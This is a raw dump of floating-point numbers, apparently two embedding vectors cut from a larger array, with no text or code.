36,0.015131898,0.007787886,-0.0037997642,-0.0056320024,0.026440058,-0.005149454,-0.014377558,-0.014754805,-0.01988178,-0.008972392,-0.026035044,0.018801201,-0.01027339,0.01153151,-0.018342733,-0.010510974,-0.007979204,-0.028366461,0.013331555,0.006120313,-0.013781703,0.0024997878,0.01479669,0.002681909,0.003497431,-0.014843606,-0.0028366065,0.0021064652,-0.0069586937,-0.020991232,-0.0033477368,-0.004253733,0.01509141,0.010186995,0.018202791,0.011936141,-0.007247429,-0.023472765,-0.025154583,-0.010151938,0.018628562,-0.011170585,-0.0017169921,-0.005050134,0.013782694,0.0600091,0.008037184,-0.00059621147,0.010282483,0.02262514,0.0097267935,0.014324122,-0.006895778,0.029272452,0.0014442408,-0.008809209,-0.023185253,0.011399537,-0.019545991,-0.002467853,0.023496706,0.014933233,-0.01730573,-0.0007554334,-0.0019739799,0.0064755315,-0.019568268,-0.014450771,0.040948953,-0.0120151,-0.007034173,0.011333438,0.0019102194,-0.010700389,-0.0042180354,0.021119148,0.008095404,0.040738765,-0.0018405912,0.0065321866,0.030398197,-0.031869516,-0.010596646,0.00010930067,0.024057053,0.02702144,-0.008025577,-0.022463154,0.003376873,0.011745298,0.018177276,0.021396725,-0.0001292692,-0.01501671,-0.02125737,-0.0047823284,0.011065593,0.01544414,0.007641564,0.005923072,-0.0074348417,-0.032072112,0.017605094,-0.0063888007,0.024600495,0.0019009155,-0.0045111864,0.02277584,0.011639176,-0.011873931,-0.030627523,-0.025159642,-0.017405314,-0.006721824,0.00064992585,0.009604558,-0.035231758,-0.023619507,0.019109586,0.027150262,-0.007342887,0.0149019575,0.0014914619,-0.016778914,-0.0053132717,-0.0010214827,-0.005783863,0.0003565414,-0.010293524,-0.00291604,0.0093752835,-0.01714722,-0.019032625,0.001493454,0.026017852,0.008148236,0.010892744,-0.0036027953,0.01689459,-0.003914884,0.025152246,-0.02403083,-0.014286405,0.021039473,-0.0005450199,-0.023449188,0.01019829,-0.03678495,0.007579525,0.019844064,-0.0077079018,-0.010437486,0.011721194,0.014849711,-0.0042768074,-0.014526597,-0.020102004,-0.0076701907,-0.011315817,0.00782668,-0.017818328,-0.02393133,0.0036131423,-0.014005922,-0.0012639527,-0.018349644,0.012252437,-0.0055067735,0.0061412347,-0.0022450078,0.028810777,-0.0051727467,-0.028185446,0.0037127465,0.018983515,0.00056048366,-0.001878964,-0.0005010919,0.008280953,-0.031003358,0.03258236,-0.016820839,-0.0033930417,0.011882275,0.016151434,0.01905113,0.010150005,0.0018158783,-0.029048681,-0.02951156,-0.0095408885,-0.042667434,0.006299178,-0.0067849583,-0.032574877,-0.02725982,-0.0010557435,-0.0044449726,-0.0014343024,-0.005831455,0.0147366095,0.005562086,0.009994814,-0.007813383,-0.017052962,-0.04039728,-0.024738694,-0.00078204164,-0.014844587,-0.0041489964,0.0038013076,-0.014383456,-0.024440855,-0.009430286,-0.01005474,-0.0035143718,-0.009422331,-0.003974336,0.003827165,0.0051782797,0.01529325,0.023551947,0.0037782283,-0.0045881816,0.0066994564,0.007922073,0.0013952614,0.012315155,-0.023657938,0.0055221687,-0.0012736587,0.008200314,0.01686511,0.045442306,-0.0054091574,0.017564366,0.01089351,0.0091505,-0.0063131317,0.010084472,0.017425384,-0.032186333,-0.03138141,0.0021634211,0.029483246,-0.012929514,-0.005899634,-0.026536983,-0.011850261,-0.017354773,-0.017623166,0.013315486,0.0069093136,0.025707025,-0.0029609737,0.016931543,0.017070677,0.010200705,0.0003584116,0.029712753,-0.001371329,0.009094368,-0.007606988,-0.007648794,0.0059396126,0.0011307393,-0.015332804,0.0057371357,-0.01472778,0.00616472,0.036498196,-0.020354811,-0.003335341,-0.016650913,0.004815383,0.0018521162,-0.013965043,-0.004886784,0.017460795,-0.039107226,-0.019975929,-0.029440563,-0.010484282,0.0073459623,-0.0013080159,0.013012026,-0.13823919,0.010034791,-0.027708452,-0.011080579,-0.014625173,-0.0047286698,0.03149744,0.029706003,0.012231149,0.0016048433,-0.015526839,0.02960492,0.01738022,0.01873147,0.007068271,0.0048205825,-0.01550609,0.004755509,-0.022881728,-0.0015366615,0.0147931045,-0.01965258,-0.0031512482,-0.0054752002,0.011555166,-0.0048275706,0.020407159,0.02060545,0.007956887,0.0074632913,0.0021506837,0.0019432756,0.019000262,-0.0010951704,0.0026647535,-0.003154609,0.015548529,0.00985441,-0.005837834,-0.0026547306,-0.0063768895,0.0068881693,-0.02106091,0.0047661397,0.00063972606,-0.00829926,-0.005521713,0.027888237,0.0001518975,0.013801072,-0.02765632,0.0027144586,0.0003061625,0.0037571667,-0.0014773062,-0.0012371464,0.00775885,-0.0005551504,0.01144116,-0.010320465,-0.0118130855,-0.019165374,-0.009347739,-0.021098357,0.00978862,-0.0016553294,-0.0104598515,-0.005853456,-0.022070628,0.009606977,-0.0019575362,0.020832213,-0.00047949926,-0.008624183,-0.029133875,0.015785826,0.021463614,-0.013586645,0.0013000437,0.027228937,-0.032642707,-0.028582493,0.0077134008,0.0144627215,-0.0073315725,0.004668202,0.015335425,0.022378603,-0.0094559565,-0.022807084,0.031611953,0.010896421,-0.013948625,-0.04742975,-0.0064262724,-0.007320209,-0.016284097,0.02636876,-0.008818198,-0.0075142016,-0.012113233,-0.010609476,0.006039433,-0.031067407,-0.12508337,-0.009308744,0.013455619,0.0037463184,-0.0029721933,-0.015634961,0.009055583,0.0032218213,0.034515653,0.00713926,0.0041440986,-0.020337136,-0.0010928866,0.00055316155,-0.01305036,0.016884534,-0.0329397,-0.000735017,0.007579732,0.0018994196,0.0063701463,-0.013037592,-0.0021996216,0.037588477,0.00945295,0.020764884,0.01394469,0.04422669,0.02018991,-0.007880109,0.0067579425,-0.0002826071,0.0010194518,-0.005899278,-0.052713122,-0.02431968,0.01492837,0.003526556,-0.0076275184,0.030229306,-0.017858855,-0.011340343,0.01869311,0.021298062,-0.010053675,-0.00077529834,-0.020946272,0.012037624,-0.0016913349,-0.011012812,-0.02014284,0.015160208,0.0016735038,-0.014672624,0.0044251564,-0.014774838,-0.026226055,-0.0068437327,0.0054418934,-0.017529473,-0.0066383053,0.0010810187,-0.01387881,0.018043356,0.001047785,0.0037906128,-0.009881811,0.0012385773,-0.0054487246,0.0060138544,-0.003207192,0.036812425,0.004022371,-0.0082101915,0.011323629,0.020803114,0.024979202,0.026536705,0.030268302,0.009329223,-0.0005300252,-0.0052721715,-0.017328095,-0.0028140023,-0.026805129,0.0172557,-0.0005834855,0.0026271578,-0.0042057107,0.022338504,-0.0146614965,0.0052251024,-0.013120599,0.030954193,0.007058458,0.008029209,0.04507452,-0.0039340253,-0.019361952,-0.020892339,-0.00813317,-0.009920971,-0.007622366,0.025414573,-0.018001212,0.034802314,0.008517283,0.00039538465,-0.0071919886,-0.007234803,-0.01214014,0.030284556,-0.014229169,0.0050934986,-0.008233814,0.010380913,-0.0020760407,-0.014993286,-0.010549277,-0.0034640308,-0.006246885,-0.010279531,0.0051516443,-0.017614603,-0.015616366,-0.019593302,-0.012187674,0.018606134,0.0058229784,-0.01669198,-0.0016629177,0.0058989073,0.0046545085,-0.0015212861,-0.00016661093,0.010794934,-0.0101744225,0.0104569495,0.010832454,-0.009899823,0.00848943,-0.008992975,-0.014450543,-0.013902586,0.0022465996,0.0023624848,-0.015953083,0.015742254,-0.0005596553,0.009375626,0.010404206,0.00082910695,0.018334003,0.005783953,0.012353901,0.014264535,0.005396466,0.009372312,-0.021239059,0.02514627,-0.015974548,0.0061867754,0.025472654,-0.011754219,-0.0064795334,0.0025404403,-0.007535647,-0.015014673,-0.012336852,-0.011695346,-0.0017284446,-0.0051070414,0.013057408,-0.048664287,0.027818725,0.010595283,0.0331394,0.0033349493,0.031130457,0.023973191,-0.018793887,0.0115739405,-0.00338113,-0.02294077,-0.00017590304,0.024225025,-0.0030372539,-0.019098453,0.015522286,-0.011453977,0.05687196,-0.003985073,-0.0367953,-0.010585126,0.0044941627,0.0048895306,0.000533626,-0.009964424,0.0006031484,-0.016361937,-0.025056181,0.0068703666,0.016890345,0.004753864,0.0119181825,0.027868524,0.0020877512,0.030550668,0.0013436489,-0.010193473,-0.0262754,0.0042907433,-0.0014089373,-0.02458614,0.017323555,0.024408586,0.011743409,-0.027930856,0.006289002,0.012453704,-0.009169592,-0.022116588,0.008228974,0.00036907135,0.005393986,0.029059269,0.02419946,0.02500376,-0.020773835,-0.004867565,0.0011931473,-0.009540228,-0.011596078,-0.02073516,0.0071654744,-0.0024792084,0.020057376,0.020944394,-0.006169674,0.0055220076,0.038508654,0.03281628,0.029408803,0.008470462,0.00837757,0.010387008,0.015791932,-0.009077617,0.026730523,0.019266646,0.0046216385,-0.012843844,-0.014679965,-0.010876004,-0.009320671,0.017582925,0.013963597,0.004198529,0.0028192715,0.012518507,-0.014091634,-0.020533549,-0.017196653,-0.01794546,-0.015800504,-0.00695352,0.010788104,-0.017123176,0.002420159,0.0149935065,-0.008722228,0.011157141,-0.02845707,0.008034891,-0.011572265,-0.0074921367,-0.001243579,0.02090356,0.0025551184,0.0036584758,0.004482365,-0.008710736,-0.0021809621,0.025656693,0.010781507,0.002170289,0.024832197,-0.0026986212,-0.0021217111,-0.002753191,-0.005859946,0.010582052,-0.02543407,-0.02188297,-0.020883998,-0.0024083236,0.0075629395,-0.023808237,0.006515829,0.010573639,0.013285595,0.00076074665,0.0025880593,-0.008777761,0.008780842,0.016708542,-0.0017703278,0.013121484,0.01387862,-0.0026539166,-0.020946352,-0.0020059962,-0.00984089,0.039500963,0.025036432,-0.007936424,-0.013569619,-0.0011460823,-0.04535318,-0.018750742,-0.010493915,-0.0025918845,0.011132269,-0.026850175,0.017239973,-0.001664566,0.0036379055,0.038293775,-0.0025260292,-0.0051400606,0.020396637,-0.049548123,0.00078265835,-0.0072622495,0.01812917,-0.0053244885,0.01550491,0.025305498,0.0069420217,0.012485724,0.0042326897,-0.0007123671,-0.0040761675,-0.00036495566,0.007949128,0.016411033,-0.0073050936,0.0112177525,0.0027309337,0.00019033423,-0.00018605117,-0.0052177203,0.010185364,0.004865387,-0.019110773,0.031467795,-0.02949824,-0.00915823,0.0023060692,0.014174937,-0.006016979,0.011266814,-0.0152172595,-0.0039449856,-0.012064229,-0.0055697067,-0.010519811,-0.0041450066,0.0049841995,0.012589704,-0.004957008,0.026090536,-0.031023402,-0.03666551,-0.0064760996,-0.08930239,-0.0073103197,-0.010652826,0.002298305,0.043750506,-0.0013736591,-0.010758489,0.0071537565,0.024790023,0.01709824,0.0000036681208,0.0022183193,-0.02117525,0.0030046438,0.027227685,-0.017458154,-0.008589226,0.012637236,-0.012942358,-0.013808089,-0.00043240926,0.0060631414,-0.0014584265,-0.012837097,0.024832293,-0.0033113628,-0.010925646,-0.0172364,0.008548167,-0.0027746577,-0.0064260764,-0.025642464,-0.022046534,0.004406126,-0.016218977,0.0042412784,-0.0006872136,0.011363756,-0.014019673,-0.017675176,-0.005766949,0.013233589,-0.0032821659,-0.0063261855,-0.022398308,-0.0026899916,-0.008865053,-0.021127466,-0.016189516,-0.009591942,0.0022560563,0.027169911,0.011557706,0.016844822,-0.008818991,0.013180132,-0.012681464,-0.01605577,0.024361042,0.0020455741,-0.023543727,0.006000121,0.009050198,0.004078584,-0.010073059,0.02125623,-0.00063183054,-0.0025875985,-0.0021914921,0.003988953,0.007740031,-0.016819736,-0.0006889645,0.0065076654,-0.009311522,0.0035008267,0.001107358,-0.025344294,-0.020039164,-0.0057281675,0.060590886,-0.004364896,0.011864511,-0.008604541,-0.0031284266,-0.004162807,-0.01259248,-0.007406259,0.036602706,0.004074625,-0.009917006,-0.008870008,0.042600624,0.020252774,-0.0037665197,0.022537963,-0.00931734,-0.0014307265,0.014558361,0.008047103,0.011883523,-0.0051079164,-0.0026846435,-0.0066072135,-0.016309686,0.011508437,-0.018415637,-0.011623093,-0.0046577305,-0.00795588,0.001975453,0.019054484,0.038539212,0.03475188,0.013298084,0.009198275,0.0022418257,0.021552755,-0.014393655,-0.012427126,-0.0045922967,0.0066045453,-0.027175115,0.019459238,0.0069620097,-0.010504339,0.000797921,0.0002548644,-0.008542736,0.008401107,-0.0050473455,0.021648133,0.021650841,0.025079837,-0.009846443,-0.00079059077,0.0028069033,0.008048574,-0.000626188,0.023118174,-0.011850897,-0.024009783,0.008471882,-0.005617946,-0.004700471,0.015523654,-0.004129327,0.009780603,0.009477408,-0.021315798,0.0054103173,-0.006351887,-0.0024242606,-0.007971083,-0.004980392,-0.017427264,0.024005601,0.00834924,-0.059693933,-0.01177493,0.001529899,0.007978603,0.026162928,-0.0008023552,-0.02520227,0.0077535254,0.01593005,-0.0018143776,-0.008562959,-0.009233527,-0.008050274,-0.009587255,0.0033407463,-0.0040635397,-0.029617256,-0.014789744,0.022410706,0.014150947,-0.0077680754,0.0132483225,-0.016153585,0.0064364844,-0.006994131,-0.0035032588,0.007873575,-0.018733043,0.005533685,0.0033266162,-0.0006155936,-0.02213428,-0.0010430206,0.014274173,-0.009946619,-0.011176005,-0.007116549,-0.006098671,0.008292498,0.000050904844,-0.0029491067,0.01316134,-0.006123828,0.0009801311,-0.030866254,0.009449419,0.041067168,0.019574624,0.0037741864,0.0049515185,0.0007291234,0.009252576,-0.004773368,-0.00094217126,0.014292493,0.09915827,0.0066790124,0.008007154,-0.001109678,0.024234656,0.010217312,0.016739918,-0.0017014521,0.02284437,-0.002816864,0.02105294,-0.0028690463,0.00525642,-0.010594726,0.0055746315,0.031690635,0.016967978,-0.0048260484,0.0053901463,0.015693549,-0.0009132423,-0.03383103,-0.0026242677,-0.03497846,-0.030980106,-0.05362744,0.022057194,0.0144765265,-0.00112651,0.020456789,0.008619077,-0.01059299,-0.0064743,-0.001459293,-0.035017133,0.00908264,0.0022289096,-0.012823912,-0.013556416,-0.0122436555,0.011785946,0.0012737365,0.0006913583,-0.023321923,-0.008334968,-0.018846432,0.0145968115,-0.0025416147,-0.0037210493,-0.013496897,-0.00035667114,-0.0010819588,0.009879431,-0.0075209546,0.0015650026,-0.020798367,0.02577974,0.005260166,0.004612455,-0.011383215,-0.0051196865,0.0036472685,0.004486721,-0.014444803,0.0014633021,0.016644409,-0.02416851,-0.009980619,-0.009662989,-0.0137856575,0.018449739,-0.014586163,0.001608756,0.014488318,0.009482283,0.019033875,-0.008618916,0.0021516352,0.018168204,-0.009785356,-0.00014515335,0.0053433203,0.019188808,0.008665471,0.011271,0.0025198138,-0.009470428,0.03356588,-0.012342074,-0.018503172,-0.0077458275,0.020645233,0.031885143,0.0072323657,0.0053313975,-0.0015486905,0.015239298,0.0051253517,-0.017375084,-0.028712964,-0.014314252,-0.008699352,-0.0043888497,-0.00046512258,0.01454042,-0.0034006834,0.0011906937,-0.004229316,-0.030962229,0.006053959,0.00054054876,0.014430159,-0.016920906,0.0323373,-0.011558738,0.029013354,-0.008474784,-0.0066950065,0.017121773,-0.010933597,-0.017502612,0.003990795,0.007690188,0.03170808,0.00931735,0.0009667944,-0.01782771,0.018002102,0.024811337,0.000011439094,0.008587335,-0.011632326,0.0121593885,0.011243227,-0.0018901088,-0.0068298196,0.042822383,-0.0028020209,0.023364762,-0.009656683,0.014426181,-0.01856238,-0.015412935,-0.019995974,0.0004999581,-0.017273637,0.03700452,-0.008007189,0.011771619,-0.018062834,0.005030161,0.021101981,-0.01900275,-0.009416545,-0.01696223,0.0054010986,-0.016072435,0.023338487,-0.023168728,-0.005927095,-0.008695355,0.00712431,0.020299876,-0.04066252,0.03327952,0.010830611,0.009880458,-0.0020811278,0.008751341,-0.016774587,-0.0013888679,-0.0026095123,0.006455212,0.0045170886,0.00385044,0.013246781,-0.0020812817,0.031972665,-0.0063535925,0.014691067,0.013131025,0.013953058,0.003361119,0.0009514777,0.024617605,-0.00302389,0.005756255,0.01082243,-0.0044471724,0.04411886,-0.000008316405,0.026658028,0.002524991,0.019306201,-0.012738336,0.020033155,-0.031090194,0.0488586,-0.025496585,-0.023849439,-0.001205173,-0.01013183,0.022673517,0.0057785884,0.006512003,-0.009786166,-0.0053189956,-0.016511846,-0.0042838035,-0.022669386,0.0068941796,-0.0034046231,0.0043009887,-0.029591538,-0.008038263,0.0063011865,0.0032266655,-0.009986668,-0.011938723,-0.007845051,0.004802674,0.030944882,-0.01569248,-0.0038306857,-0.0031773613,0.0016838382,-0.005634967,-0.014119209,0.008510409,-0.018099241,-0.025510127,0.000058879807,0.004723739,0.009318037,-0.007718293,0.0029281895,0.022632588,0.014689464,-0.0006451154,-0.0018296897,-0.00013867211,0.009300937,0.020182714,-0.0055094725,-0.031110283,-0.012914921,-0.016148303,-0.011322261,0.012837979,-0.032815076,-0.03671121,0.0024391462,0.010004911,-0.014444459,-0.020713178,-0.015223832,-0.006512451,0.014225628,0.008174605,-0.0031796526,0.008520703,0.028900687,-0.016879514,0.004804571,-0.0053620506,-0.0021705753,0.016543772,-0.019530708,0.00057956827,0.017923625,-0.029751953,-0.0041820914,-0.01616932,0.023139875,0.019601563,-0.002314153,0.014003242,-0.0034855695,0.0044177314,-0.015568166,0.0041565136,-0.015815197,-0.0044177547,-0.0072283125,-0.016250921,-0.010213797,-0.023994075,0.023805313,0.051765915,-0.07188691,0.0021291794,0.03398208,-0.019508723,-0.05104132,0.020581944,-0.0023703934,-0.03420704,-0.02298841,0.008540716,0.020609086,-0.011584667,-0.026251953,0.0063776425,0.009581867,-0.004797772,0.0059367805,0.012264088,-0.011356282,-0.0046478026,0.01940432,-0.018846272,-0.003608057,-0.0039640595,0.004849084,-0.015088445,-0.0037613318,0.014105714,-0.008551132,0.010089336,-0.0031098109,0.032544963,-0.0062806197,-0.007791783,0.010765007,-0.005657777,0.017463585,-0.010580181,-0.016167877,-0.0376159,-0.009244834,-0.016646381,-0.0038066632,0.021193696,-0.0023220966,-0.015299531,0.019190442,-0.016386252,0.10708047,-0.008612284,-0.012957139,-0.0005907006,-0.0013051745,-0.012450191,0.006549437,0.022902096,0.00008502899,0.023733307,-0.0045188554,-0.009911648,0.018234862,0.04281549,-0.018908702,0.0004018225,-0.0060458016,0.111769356,-0.010269758,0.022531375,0.0193281,0.014617462,-0.0028812692,0.021538494,0.019613672,-0.07008203,-0.006623291,-0.02856731,0.008187465,0.0018204887,-0.030069655,0.0131429145,0.0015417455,-0.0051806243,-0.00028841558,0.03047576,-0.0035084435,-0.008436373,-0.040050153,0.00026022262,0.005870071,0.004301075,-0.012580205,0.032447044,-0.022296144,0.008114361,-0.030257454,0.015760625,0.00067469093,0.028017433,0.012827847,-0.0023440619,0.024773043,0.012766615,-0.0145200305,0.0034987496,0.0053825667,0.019145839,-0.03208029,-0.002008398,-0.027739681,-0.003158273,0.016975785,0.02468288,-0.008684762,-0.007516248,-0.0027645195,0.00872461,0.011555413,0.012529706,0.01835476,0.030767022,-0.01977914,-0.0046297074,0.02012667,-0.0026244114,-0.008029856,-0.012360976,0.011521087,-0.0046091117,0.021892795,0.011528409,-0.009503926,0.007683351,-0.0024043047,0.022581195,0.0029158504,0.018140657,0.00613152,-0.0067483494,0.002056827,0.010380865,-0.01621409,0.014331279,0.01859885,0.028138645,0.0062611727,-0.011516718,0.0036417944,-0.014521709,-0.0007038358,0.0154202245,-0.0039152694,-0.017117985,0.011231249,0.006314579,-0.02973002,-0.03235646,0.0007225169,0.0050016153,0.0074854954,0.0026174323,-0.010290044,0.008742992,-0.01964367,-0.013765832,0.0045330375,-0.0013572492,-0.021008642,-0.0159461,0.011020729,-0.0062643946,-0.0057055713,0.020757321,-0.007394649,0.0011563656,0.012044533,0.012935629,-0.014203329,0.0051895813,-0.018192383,0.0021139504,0.010034528,0.04767758,-0.00076297106,-0.027940148,0.008889502,-0.027223924,-0.031536996,-0.027213166,0.017909233,-0.00033995166,-0.0024602057,-0.010664794,-0.006106955,-0.008379776,0.0101944385,0.0009795307],[0.004589515,0.0049611945,-0.010712097,-0.01516297,0.010421796,0.0018873743,-0.002405375,0.008619725,-0.018233845,-0.016008869,0.0076861987,0.027676273,-0.026267143,0.009138571,-0.012060549,0.0010383603,0.018825188,0.0015076336,0.015168509,0.0040910407,-0.005088363,-0.004650621,0.008516894,0.0034665957,0.0070586214,-0.012167078,-0.0056752204,-0.014221914,-0.004419668,-0.0020183066,0.012942293,0.020700615,0.00926419,-0.0009665309,0.014116008,-0.00399123,-0.008757332,0.00081849133,0.0027923782,-0.004049576,-0.025433004,0.00927532,0.0063273627,0.025571872,-0.0049217786,0.0024691229,0.013320836,0.009286339,-0.02405514,0.0006013919,0.01745511,0.0010410117,-0.029282928,0.014160991,0.004156876,0.015780888,-0.012778926,-0.016964383,0.0075425524,-0.0077881324,-0.008043197,-0.004153934,-0.003746023,-0.022053372,0.044528987,-0.011547878,0.0055997465,0.009558536,-0.009014881,-0.02286499,0.008242736,0.002224505,-0.0044209496,0.016594965,0.029570421,0.010420061,0.008600446,-0.025622452,-0.025281772,0.010056876,0.007296044,-0.01791716,-0.0038637372,-0.0037024654,0.0001676964,-0.0010570266,-0.009963628,-0.006031957,0.001406602,-0.028034355,-0.004693584,-0.010601228,0.013139224,0.005527089,-0.031778023,0.020278856,0.015038588,-0.004002555,-0.009848303,0.0060465448,-0.006037483,0.00013961227,-0.019135667,0.009160114,0.004407091,-0.011322958,0.013895593,-0.031006616,0.0026831701,-0.015536993,-0.009906093,0.012093061,-0.00010617185,0.00025203003,0.0041134176,-0.0062623983,0.011910105,0.015097071,-0.0069099823,-0.0014345502,-0.010607051,0.03420943,0.026259469,0.007709173,-0.010387826,-0.0057793236,-0.00021766096,-0.009382346,0.0057793455,0.0030266242,-0.006328559,0.017571298,0.0032989215,-0.0047632237,-0.016646525,0.0032725132,-0.0025269494,-0.02134362,-0.005667907,-0.023254434,0.010197544,0.0060670623,0.02086382,0.0034742737,0.016378751,0.01085784,0.0052236714,0.018874971,-0.0006295764,-0.020483255,-0.00040916813,-0.004905238,-0.009262369,-0.018626135,-0.011606071,0.009782966,-0.01137987,-0.012592254,-0.010440656,0.00936666,-0.004680193,0.0080878455,0.011355468,-0.0031578578,-0.010793724,-0.026453903,0.011337214,-0.008992179,-0.032092612,-0.01958466,0.005325261,0.034191556,0.010608117,-0.0045698476,0.016214827,0.04308951,-0.00913005,-0.019967185,-0.0013474828,0.0003352077,0.0151808,0.02336461,0.013615112,0.0077344347,0.015892109,0.011374342,-0.012707499,-0.0029349234,-0.01734913,-0.0074214768,0.007446193,0.011397372,-0.0061206054,0.009151991,0.00587655,-0.026813636,-0.008077419,0.09167618,0.006175952,-0.019601606,0.0075336657,-0.006747732,-0.0017251691,-0.022031613,0.0073421933,-0.011281915,-0.01101797,-0.012572938,0.020775335,0.0008768303,0.013851717,-0.007742665,-0.0058163786,0.0018602664,0.0052691796,-0.060230978,-0.0069509484,-0.0026011523,0.03412977,0.0021741383,-0.004896856,0.0070920517,0.010415175,-0.038511343,-0.0042638965,-0.021143282,-0.013810598,-0.013259812,0.009389614,-0.017395766,0.00433596,0.011795206,-0.023003528,-0.022730237,0.0023306047,-0.013048283,-0.0073433835,-0.015972953,-0.008980997,-0.0053745466,-0.0017658593,-0.002346788,0.00800294,0.04463499,-0.002835805,0.008874185,0.022876842,0.0062990845,-0.011538729,0.020890212,0.026085751,-0.011799535,-0.0007389993,0.009124721,-0.002999202,-0.012995619,0.018738754,-0.012007464,0.009429796,0.0050827675,0.01958504,0.03396802,-0.0038943442,0.01496363,0.036584657,0.0026879525,-0.0035944353,-0.031139078,-0.02219725,-0.035727818,-0.025853314,0.020901417,0.011999164,0.003798727,-0.00053940195,-0.0024436936,0.0046582054,0.004007443,0.0022373854,0.016663954,0.0005728639,0.003103701,-0.008617789,-0.020443384,-0.009756937,0.015763685,-0.0048854398,0.015482659,0.04141529,-0.011942777,-0.0012525267,0.018887307,0.039021794,-0.0067201005,-0.029128639,-0.0014868898,-0.014642185,0.009487659,0.004869796,-0.013885144,0.005289346,-0.004236519,0.016158093,-0.0015563602,-0.014312473,-0.0038001055,0.0027662532,0.03975458,-0.021676445,0.033781767,-0.020667713,-0.009407594,-0.034238607,-0.010766543,0.012358856,-0.008548624,0.013010591,-0.0062378496,0.004900705,0.00051507,0.018139381,-0.035960525,0.014846652,-0.024484154,-0.017042002,-0.0071735126,0.005131832,-0.0036779877,0.0052240337,0.01313882,-0.0023274748,0.0048711677,0.02115523,0.014661744,-0.0029397856,0.04172862,-0.018870136,0.022809869,0.016345182,-0.00034066578,-0.0148672275,-0.0054720086,-0.010159572,-0.0100717135,-0.011502,-0.014716356,0.010097093,0.0039178766,0.019984415,0.025797427,0.005498058,-0.00023018346,0.014091132,0.008825374,0.003942204,-0.01350793,-0.01329489,-0.0115717435,0.0022367355,-0.0077147237,0.03277059,-0.013361082,-0.010910898,0.009870419,0.052224685,-0.019348476,0.008287066,0.016785296,-0.026408145,-0.0076364907,0.0037884815,0.008196314,-0.024541553,-0.015178263,0.0020161779,-0.026222162,0.00933091,0.0035594564,-0.016127741,0.0037265741,-0.01971344,-0.019884745,-0.015118772,-0.024516247,0.029193273,0.0015445768,-0.0050343224,0.018782947,0.017891604,0.02149923,0.01584251,0.008030716,0.010038013,-0.027575666,-0.0008229303,0.014856102,0.010520101,-0.0012139614,-0.019038644,0.024372283,0.007510425,0.0044111903,0.010179783,-0.004012425,0.019539569,0.010597582,0.00041232017,-0.014954012,0.0038482863,0.027874915,-0.009535452,-0.0247451,-0.01927894,0.0003240385,0.0011723641,0.016369205,-0.021623224,0.009702559,-0.01109142,0.014644147,0.01574513,-0.022032725,0.033504054,0.017572867,0.022975735,0.031854305,-0.0052416716,0.00363302,-0.0020176754,0.042972744,-0.020242069,-0.015608771,0.0107405735,0.0022057418,-0.00031487932,0.013873509,-0.0005282029,0.017950976,-0.008345407,0.0016212821,-0.0030819536,0.0021613478,0.023183387,0.0011420249,-0.009158963,0.0013415592,0.013131976,-0.022568647,0.0048548393,0.0032476764,0.002820235,0.010872371,0.009548847,0.0012997463,-0.02062187,-0.0050354633,0.009939767,-0.01501794,0.04171375,0.005178795,0.004851018,0.017004956,0.002512891,-0.012643301,0.011319815,-0.005277683,0.0071363063,-0.013859213,0.008628101,-0.0115261935,0.0036227426,0.007866606,0.0017309167,0.025053008,-0.024675136,0.008335371,-0.010350215,-0.029647358,0.0100440495,-0.01660655,-0.0050637103,-0.023557885,-0.0069495547,0.006491543,0.016040687,-0.0056009213,0.003834972,0.011988254,0.013992977,0.022532888,-0.01015782,-0.0075664343,-0.00090858893,0.0046205525,0.00125869,0.025550049,0.00087174895,-0.041479,0.006365218,0.00054626924,-0.0051289024,-0.029417763,0.025440266,-0.0023272573,0.0075519625,0.018574936,0.04331269,0.0026638792,0.008356676,0.02996535,0.022620128,0.0036763563,-0.020387951,-0.010377521,-0.011183304,-0.006309566,0.0014415977,-0.0031631684,-0.004402399,0.015238672,0.00750928,-0.02085236,-0.013375391,0.00021452055,0.044686694,-0.029441347,0.02189636,0.013924792,0.0011205144,0.019509813,0.0051837084,0.05016302,-0.019951541,-0.01753076,0.013947063,0.017477203,0.026920268,-0.01969724,0.015302083,-0.02685582,0.02356335,-0.0066295504,0.009026444,0.015321831,0.0216207,-0.013876561,0.0044617923,0.008151217,0.013095168,-0.011020969,-0.008050036,0.031598035,-0.025981331,-0.0065369518,-0.026380638,0.003383074,0.006818728,0.018267998,0.0023607058,-0.020164939,-0.008246232,-0.020172521,-0.011359849,0.0121667255,-0.010305973,0.018750487,-0.006017268,0.04075581,0.008545962,0.0016231,0.03022733,-0.020127544,-0.0010894263,0.00798673,0.01998085,-0.011328063,-0.0044100424,0.035587832,0.01423683,0.006318846,0.007682784,-0.010793727,0.0096162995,-0.0072506857,0.02409088,-0.024662342,-0.004895099,0.021825584,0.012580092,-0.01851233,0.017225957,0.008585357,0.009122845,0.007860467,-0.0012750092,-0.01086392,-0.029225864,0.0068660467,0.007694197,-0.009144437,-0.025058327,0.010259338,0.010444804,-0.0019840065,-0.027858432,0.007291108,0.0020154198,-0.00935104,-0.003780128,0.0005748223,-0.0079304725,-0.0037051793,0.014386191,-0.0041915043,-0.022786327,0.01468106,-0.006749908,-0.0088189915,-0.003418361,-0.0031544534,-0.024320448,0.006640963,-0.015660772,0.007912256,0.033580177,0.0137937525,0.027442671,-0.006263582,-0.028751185,-0.015820501,0.015160637,-0.017764013,0.0040278235,-0.016733248,0.02482184,-0.014692488,0.0063127186,0.012687933,-0.0026211727,-0.0062092612,-0.016256953,0.009152784,-0.042371724,0.0010771273,-0.0048109535,0.019766076,-0.007648474,0.042326145,0.020484082,0.013037969,-0.014845049,0.0051239906,-0.014107414,-0.002952176,-0.008076611,0.011246841,0.024486888,-0.003358996,-0.0337328,-0.043974195,-0.020207739,-0.0053935773,-0.018643705,0.032710537,0.018387435,0.014904055,-0.0054364433,0.0082015805,-0.0055016843,-0.0048642396,-0.00655747,-0.041843142,-0.0014822016,0.004664335,-0.01402728,-0.014627185,-0.031494584,-0.008439775,-0.013259287,0.001143638,-0.004286254,0.00348151,-0.0053234226,-0.030390672,-0.025926288,-0.00673443,-0.030379672,0.025519835,-0.011840831,0.007761507,0.021563072,0.031091196,0.02405513,0.0064780856,0.0017377776,0.008564871,0.0000768614,-0.00097081735,-0.006070139,0.020001026,-0.009856721,0.0029902847,-0.0013923998,0.014386156,0.01352924,-0.017349562,0.020374998,0.03182809,0.037540965,-0.005781999,0.028153103,-0.017195094,0.011706352,-0.0027507069,0.002301318,0.0012681861,0.011862449,0.0011716009,0.0042917957,0.020964442,-0.0062045837,0.018758845,0.0039175022,-0.024031773,0.001103478,0.027603434,0.017261794,0.009314299,0.0076646325,0.0077646933,-0.003225967,-0.012081954,-0.012731818,0.000035465324,-0.003147857,0.010263286,-0.012148874,-0.0061797895,-0.016596697,-0.040644776,0.0015338697,0.01757199,0.0016707357,0.003939804,0.00317429